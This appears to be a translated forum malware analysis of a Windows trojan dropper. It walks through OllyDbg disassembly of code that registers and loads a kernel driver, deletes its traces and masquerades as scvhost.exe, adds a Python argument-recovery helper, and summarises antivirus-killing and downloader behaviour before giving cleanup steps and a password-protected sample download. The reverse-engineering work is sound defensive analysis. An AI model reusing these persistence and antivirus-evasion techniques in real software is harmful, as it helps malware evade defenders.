00401654 . FF75 F4 push dword ptr ss:[ebp-0xC]
00401657 . FF15 DC104000 call dword ptr ds:[0x4010DC] ; advapi32.OpenServiceA
0040165D . 8945 C0 mov dword ptr ss:[ebp-0x40],eax
00401660 . 8B45 C0 mov eax,dword ptr ss:[ebp-0x40]
00401663 . 8945 CC mov dword ptr ss:[ebp-0x34],eax
00401666 . 837D C0 00 cmp dword ptr ss:[ebp-0x40],0x0
0040166A . 74 25 je Xdump_.00401691
0040166C . 6A 00 push 0x0
0040166E . 6A 00 push 0x0
00401670 . FF75 C0 push dword ptr ss:[ebp-0x40]
00401673 . FF15 C8104000 call dword ptr ds:[0x4010C8] ; advapi32.StartServiceA
00401679 . 85C0 test eax,eax
0040167B . 75 09 jnz Xdump_.00401686
0040167D . FF15 20104000 call dword ptr ds:[<&kernel32.GetLastErr>; [GetLastError
00401683 . 8945 D0 mov dword ptr ss:[ebp-0x30],eax
00401686 > FF75 CC push dword ptr ss:[ebp-0x34]
00401689 . FF15 D0104000 call dword ptr ds:[0x4010D0] ; advapi32.CloseServiceHandle
0040168F . EB 09 jmp Xdump_.0040169A
00401691 > FF15 20104000 call dword ptr ds:[<&kernel32.GetLastErr>; [GetLastError
00401697 . 8945 D0 mov dword ptr ss:[ebp-0x30],eax
0040169A > FF75 F4 push dword ptr ss:[ebp-0xC]
0040169D . FF15 D0104000 call dword ptr ds:[0x4010D0] ; advapi32.CloseServiceHandle
004016A3 . EB 09 jmp Xdump_.004016AE
004016A5 > FF15 20104000 call dword ptr ds:[<&kernel32.GetLastErr>; [GetLastError
This sequence of SCM calls loads the just-dropped pcidump.sys. Reading the pushes back into CreateServiceA's parameters: service and display name "pcidump", dwDesiredAccess = 0xF01FF (SERVICE_ALL_ACCESS), dwServiceType = 1 (SERVICE_KERNEL_DRIVER), dwStartType = 3 (SERVICE_DEMAND_START), dwErrorControl = 0 (SERVICE_ERROR_IGNORE) and the binary path from [ebp+0x8]. If creation fails (the service already exists from an earlier run), it opens the existing service, stops it with ControlService(SERVICE_CONTROL_STOP = 1), calls DeleteService and creates it again. It then reopens the service with SERVICE_START (0x10) and calls StartServiceA, which loads the driver. Note that nothing on the success path ever deletes the service, so the "pcidump" entry stays registered even after the .sys file is removed below.
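Reading the parameters off the listing the way it was done above (the last push is the first parameter, because Win32 APIs use stdcall) can be mechanised. The following Python script is an added example and not part of the original post: it parses OllyDbg's text format as pasted on this page, walks back from the call to advapi32.CreateServiceA (and from the OpenServiceA call at 00401657) collecting the pushes, maps them onto the SDK prototypes and names the flag values. The listing lines embedded in it are copied from this page; the prototypes and constant names come from the Windows SDK, and only the values that occur in this sample are tabulated.

```python
"""Recover stdcall arguments from an OllyDbg listing (added example).

Win32 APIs are stdcall: arguments are pushed right to left, so the last push
before the call is the first parameter.  LISTING is copied from the page;
prototypes and flag names are from the Windows SDK (only values seen here)."""
import re

LISTING = """
00401597 . 6A 00 push 0x0
00401599 . 6A 00 push 0x0
0040159B . 6A 00 push 0x0
0040159D . 6A 00 push 0x0
0040159F . 6A 00 push 0x0
004015A1 . FF75 08 push dword ptr ss:[ebp+0x8]
004015A4 . 6A 00 push 0x0
004015A6 . 6A 03 push 0x3
004015A8 . 6A 01 push 0x1
004015AA . 68 FF010F00 push 0xF01FF
004015AF . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
004015B4 . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
004015B9 . FF75 FC push dword ptr ss:[ebp-0x4]
004015BC . FF15 D4104000 call dword ptr ds:[0x4010D4] ; advapi32.CreateServiceA
0040164D . 6A 10 push 0x10
0040164F . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
00401654 . FF75 F4 push dword ptr ss:[ebp-0xC]
00401657 . FF15 DC104000 call dword ptr ds:[0x4010DC] ; advapi32.OpenServiceA
"""

CREATE_SERVICE_A = ["hSCManager", "lpServiceName", "lpDisplayName", "dwDesiredAccess",
                    "dwServiceType", "dwStartType", "dwErrorControl", "lpBinaryPathName",
                    "lpLoadOrderGroup", "lpdwTagId", "lpDependencies",
                    "lpServiceStartName", "lpPassword"]
OPEN_SERVICE_A = ["hSCManager", "lpServiceName", "dwDesiredAccess"]

FLAG_NAMES = {
    "dwDesiredAccess": {0xF01FF: "SERVICE_ALL_ACCESS", 0x10: "SERVICE_START"},
    "dwServiceType": {0x1: "SERVICE_KERNEL_DRIVER"},
    "dwStartType": {0x3: "SERVICE_DEMAND_START"},
    "dwErrorControl": {0x0: "SERVICE_ERROR_IGNORE"},
}

# address, optional flow markers (. > ^), uppercase opcode bytes, lowercase
# mnemonic plus operands, optional "; comment"
LINE_RE = re.compile(r"^(?P<addr>[0-9A-F]{8})\s+(?:[.>^]\s*)*(?:[0-9A-F]+\s+)+?"
                     r"(?P<insn>[a-z][^;]*?)\s*(?:;\s*(?P<comment>.*))?$")


def parse_listing(text):
    """One dict per OD line: address, mnemonic, operands, comment."""
    rows = []
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        mnemonic, _, operands = m.group("insn").strip().partition(" ")
        rows.append({"addr": m.group("addr"), "mnemonic": mnemonic,
                     "operands": operands.strip(),
                     "comment": (m.group("comment") or "").strip()})
    return rows


def push_value(row, prev):
    """Immediate -> int, OD's ASCII comment -> str, lea+push eax -> '&buffer', else raw."""
    op = row["operands"]
    if op.startswith("0x"):
        return int(op, 16)
    s = re.search(r'ASCII "([^"]*)"', row["comment"])
    if s:
        return s.group(1)
    if op == "eax" and prev and prev["mnemonic"] == "lea" and prev["operands"].startswith("eax,"):
        return "&" + prev["operands"][4:]  # pointer to a stack buffer
    return op


def recover_args(rows, api, prototype):
    """Walk back from `call ... ; api` over len(prototype) pushes; last push -> first param."""
    idx = next(i for i, r in enumerate(rows)
               if r["mnemonic"] == "call" and api in r["comment"] + r["operands"])
    pushes, i = [], idx - 1
    while i >= 0 and len(pushes) < len(prototype):
        if rows[i]["mnemonic"] == "push":
            pushes.append(push_value(rows[i], rows[i - 1] if i else None))
        elif rows[i]["mnemonic"] == "call":
            break  # an earlier call has already consumed its own pushes
        i -= 1
    if len(pushes) != len(prototype):
        raise ValueError("%s: expected %d pushes, found %d" % (api, len(prototype), len(pushes)))
    return dict(zip(prototype, pushes))


def describe(args):
    """Replace known numeric flags with their SDK names."""
    return {k: FLAG_NAMES.get(k, {}).get(v, v) if isinstance(v, int) else v
            for k, v in args.items()}


if __name__ == "__main__":
    rows = parse_listing(LISTING)
    for api, proto in (("CreateServiceA", CREATE_SERVICE_A), ("OpenServiceA", OPEN_SERVICE_A)):
        print(api)
        for name, val in describe(recover_args(rows, api, proto)).items():
            print("  %-18s %s" % (name, val))
```

The same routine works for any of the calls on this page once the prototype is supplied; the `lea eax, ...; push eax` case turns the lstrcpy/lstrcat buffers above into readable `&dword ptr ss:[ebp-0x12C]` references instead of a bare `eax`.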
00401763 FF75 08 push dword ptr ss:[ebp+0x8]
00401766 FF15 24104000 call dword ptr ds:[<&kernel32.DeleteFile>; kernel32.DeleteFileA
With the driver loaded, it deletes the driver file.
00402E46 6A 01 push 0x1
00402E48 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-0x104]
00402E4E 50 push eax
00402E4F 8D85 8CF8FFFF lea eax,dword ptr ss:[ebp-0x774]
00402E55 50 push eax
00402E56 FF15 64104000 call dword ptr ds:[<&kernel32.MoveFileEx>; kernel32.MoveFileExA
MoveFileExA with MOVEFILE_REPLACE_EXISTING (1) moves the sample into c:\windows\system32 under the name scvhost.exe, and then the program exits.
Next I took a quick look at the DLL I had grabbed: its main function seems to be hijacking the registry and forcibly terminating a large number of antivirus processes.
Then I briefly analysed the EXE: it invokes a userinit.exe and then downloads a txt file from a site; the site is already dead, so the download fails. There would presumably be more activity after a successful download, but since it failed I did not analyse any further.
userinit.exe feels like it does much the same as the EXE above.
There is also the driver file; since I am still at the hello-world stage with drivers, I really can't handle it, but my guess is that it just protects the malware.
Okay, that's about it for the analysis; time to summarise.
Judging by its behaviour this is a downloader. On startup it first opens Notepad and exits if that fails, which is odd (I have seen people do this before to probe for an AV sandbox). It then stops the NOD32 service and kills its processes, drops a DLL and loads it (this DLL mainly hijacks the registry and force-kills a long list of antivirus processes), drops an EXE that is essentially a downloader (the site is dead, so I don't know what it fetches), and drops and loads a kernel driver. Finally it copies itself to c:\windows\system32 as scvhost.exe (easily mistaken for svchost, isn't it).
Finally, my proposed cleanup:
1. Terminate the malware process.
2. Force-delete scvhost.exe from c:\windows\system32.
3. Force-delete the files the trojan dropped (it may already have deleted them itself).
4. Stop and delete the pcidump service it registered; the service entry outlives the deleted driver file.
5. Run a full scan with antivirus software.
Sample attachment:
1.rar (32.98 KB)
Archive password: 52pojie